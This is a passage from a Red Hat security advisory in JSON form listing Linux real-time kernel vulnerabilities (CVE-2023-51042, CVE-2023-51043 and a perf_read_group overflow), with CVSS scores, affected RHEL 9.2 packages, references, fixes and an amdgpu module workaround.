"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size"
},
{
"cve": "CVE-2023-51042",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2259866"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Linux kernel\u0027s AMD GPU driver which may allow access to members of a synchronization structure after the structure is freed. This issue could allow a local user to crash the system or to access confidential system memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only applicable to the amdgpu module, which is typically only loaded on systems that use AMD GPU hardware. Use the `lsmod` command to determine whether the amdgpu module is loaded.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-51042"
},
{
"category": "external",
"summary": "RHBZ#2259866",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259866"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-51042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51042"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-51042",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51042"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628",
"url": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628"
}
],
"release_date": "2024-01-23T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent the amdgpu module from loading. Please see https://access.redhat.com/solutions/41278 for more information on how to prevent kernel modules from loading. Note that if a system has an AMD GPU, this may make certain features of that GPU unavailable.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c"
},
{
"cve": "CVE-2023-51043",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2260005"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel Direct Rendering Infrastructure (DRI) subsystem in which a use-after-free can be caused when a user triggers a race condition between a nonblocking atomic commit and a driver unload. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: use-after-free during a race condition between a nonblocking atomic commit and a driver unload in drivers/gpu/drm/drm_atomic.c",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Enterprise Linux 8 and Red Hat Enterprise Linux 9 affected. The impact level is Moderate, because potential use-after-free could happen only during loading/unloading driver (that requires some privileges).",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
